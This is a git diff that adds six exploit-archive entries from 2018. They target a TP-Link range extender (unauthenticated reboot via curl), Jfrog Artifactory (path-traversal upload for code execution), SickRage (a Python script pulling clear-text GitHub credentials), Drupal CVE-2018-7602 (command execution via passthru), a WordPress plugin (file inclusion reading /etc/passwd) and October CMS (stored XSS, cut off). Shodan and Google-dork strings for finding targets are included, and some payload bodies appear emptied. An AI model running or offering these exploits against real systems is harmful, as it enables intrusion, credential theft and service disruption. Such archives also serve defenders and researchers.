diff --git a/exploits/hardware/webapps/44550.txt b/exploits/hardware/webapps/44550.txt
new file mode 100644
index 000000000..9f36e6077
--- /dev/null
+++ b/exploits/hardware/webapps/44550.txt
@@ -0,0 +1,22 @@
+# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
+# Date: 25/04/2018
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.tp-link.com/
+# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
+# Category: dos
+
+1. www.shodan.io (with title "Opening...")
+
+"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="
+
+2. Proof of Concept
+
+
+:System Log:
+/data/systemlog.txt?operation=save
+
+:Encrypted Configuration File:
+/data/config.bin?operation=backup
+
+:Reboot:
+curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'
\ No newline at end of file
diff --git a/exploits/linux/webapps/44543.txt b/exploits/linux/webapps/44543.txt
new file mode 100644
index 000000000..172d72b89
--- /dev/null
+++ b/exploits/linux/webapps/44543.txt
@@ -0,0 +1,108 @@
+# Exploit Title: Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution
+# Date: 2018-04-25
+# Exploit Author: Alessio Sergi
+# Vendor Homepage: https://jfrog.com/artifactory/
+# Software Link: https://bintray.com/jfrog/artifactory/download_file?file_path=jfrog-artifactory-oss-4.15.0.zip
+# CVE : CVE-2016-10036
+
+Jfrog Artifactory < 4.16 is vulnerable to unauthenticated arbitrary file upload and directory traversal vulnerabilities.
+The vulnerabilities are within the upload api "/artifactory/ui/artifact/upload", require that "Allow Anonymous Access" is enabled (as it is on a default installation) and can be abused to create or overwrite files on the server. Specifically, it is possible to create or overwrite any files inside the application folder (scenario 1) or deploy a new application (scenario 2) and execute arbitrary code on the server.
+
+
+Scenario 1: It is possible to modify the html files of the application just by executing an http post request like the one below, which exploits a directory traversal vulnerability on the parameter "filename" to insert the javascript code "" within the file app.html :
+
+******
+
+POST /artifactory/ui/artifact/upload HTTP/1.1
+Host: [removed]
+User-Agent: [removed]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Length: 1749
+Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
+Connection: close
+
+-----------------------------6085305491255810029929874687
+Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html"
+Content-Type: application/zip
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+-----------------------------6085305491255810029929874687--
+
+******
+
+(It is also possible to exploit this vulnerability to create JSP files within the application folder, but the tomcat used by Artifactory on a default installation won't execute them.)
+
+
+
+Scenario 2:
+
+It is possible to exploit the same vulnerability to deploy a malicious servlet application on the tomcat server and obtain remote code execution:
+
+******
+
+POST /artifactory/ui/artifact/upload HTTP/1.1
+Host: [removed]
+User-Agent: [removed]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Length: 3515
+Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
+Connection: close
+
+-----------------------------6085305491255810029929874687
+Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/malicious-servlet.war"
+Content-Type: application/zip
+
+PK��3[--SNIP--]
+WEB-INF/lib/PK������r��>����
+
+-----------------------------6085305491255810029929874687--
+
+******
\ No newline at end of file
diff --git a/exploits/linux/webapps/44545.py b/exploits/linux/webapps/44545.py
new file mode 100755
index 000000000..937df2fa4
--- /dev/null
+++ b/exploits/linux/webapps/44545.py
@@ -0,0 +1,99 @@
+# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
+# Date: 2018-04-01
+# Exploit Author: Sven Fassbender
+# Vendor Homepage: https://sickrage.github.io
+# Software Link: https://github.com/SickRage/SickRage
+# Version: < v2018.03.09-1
+# CVE : CVE-2018-9160
+# Category: webapps
+
+#1. Background information
+
+"SickRage is an automatic Video Library Manager for TV Shows.
+It watches for new episodes of your favourite shows, and when they are posted it does its magic:
+automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io
+
+#2. Vulnerability description
+
+SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses.
+Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)
+
+HTTP request:
+GET /config/general/ HTTP/1.1
+Host: 192.168.1.13:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.13:8081/config/backuprestore/
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+HTTP response:
+HTTP/1.1 200 OK
+Content-Length: 113397
+Vary: Accept-Encoding
+Server: TornadoServer/4.5.1
+Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
+Date: Fri, 02 Mar 2018 10:47:51 GMT
+Content-Type: text/html; charset=UTF-8
+
+
+
+
+
+ [...]
+
+ [...]
+
+ [...]
+
+
+
+
+#3. Proof of Concept
+
+#!/usr/bin/env python
+import urllib3
+import sys
+import requests
+from BeautifulSoup import BeautifulSoup
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+init(autoreset=True)
+
+if __name__ == '__main__':
+ if len(sys.argv) != 3:
+ print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
+ else:
+ host = sys.argv[1]
+ print "https://www.shodan.io/host/{0}".format(host)
+ port = sys.argv[2]
+ print "*** Get GitHub User credentials from SickRage ***"
+ url = "http://{0}:{1}/config/general".format(host, port)
+ response = requests.get(url, timeout=5)
+ parsed_html = BeautifulSoup(response.text)
+ try:
+ git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
+ git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value")
+ if str(git_password) != "None" and str(git_password) != "None":
+ if len(git_password) >= 1 and len(git_username) >= 1:
+ print str(git_username)
+ print str(git_password)
+ except AttributeError:
+ pass
+
+
+#4. Timeline
+
+[2018-03-07] Vulnerability discovered
+[2018-03-08] Vendor contacted
+[2018-03-08] Vendor replied
+[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
+
+#5. Recommendation
+
+Update the SickRage installation on v2018.03.09-1 or later.
+Protect the access to the web application with proper user credentials.
\ No newline at end of file
diff --git a/exploits/php/webapps/44542.txt b/exploits/php/webapps/44542.txt
new file mode 100644
index 000000000..82f578105
--- /dev/null
+++ b/exploits/php/webapps/44542.txt
@@ -0,0 +1,18 @@
+This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
+
+You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
+
+POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
+[...]
+form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
+
+Retrieve the form_build_id from the response, and then triggering the exploit with :
+
+POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
+[...]
+form_build_id=[FORM_BUILD_ID]
+
+This will display the result of the whoami command.
+
+Patch your systems!
+Blaklis
\ No newline at end of file
diff --git a/exploits/php/webapps/44544.php b/exploits/php/webapps/44544.php
new file mode 100644
index 000000000..c2e2d7fd2
--- /dev/null
+++ b/exploits/php/webapps/44544.php
@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
+# Date: 2018-04-25
+# Exploit Author: Wadeek
+# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
+# Software Version: 1.0
+# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
+# Tested on: Apache2 with PHP 7 on Linux
+# Category: webapps
+
+
+1. Version Disclosure
+
+/wp-content/plugins/wp-with-spritz/readme.txt
+
+2. Source Code
+
+if(isset($_GET['url'])){
+$content=file_get_contents($_GET['url']);
+
+3. Proof of Concept
+
+/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
+/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
\ No newline at end of file
diff --git a/exploits/php/webapps/44546.txt b/exploits/php/webapps/44546.txt
new file mode 100644
index 000000000..a7b7aaa32
--- /dev/null
+++ b/exploits/php/webapps/44546.txt
@@ -0,0 +1,20 @@
+# Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting
+# Date: 2018-04-03
+# Author: 0xB9
+# Software Link: https://octobercms.com/plugin/rainlab-user
+# Version: 1.4.5
+# Tested on: Ubuntu 17.10
+# CVE: CVE-2018-10366
+
+#1. Description:
+Front-end user management for October CMS. Allows visitors to create a website.
+
+#2. Proof of Concept:
+
+Persistent XSS
+- Go to the account page localhost/OctoberCMS/account/
+- Register & enter the following for your full name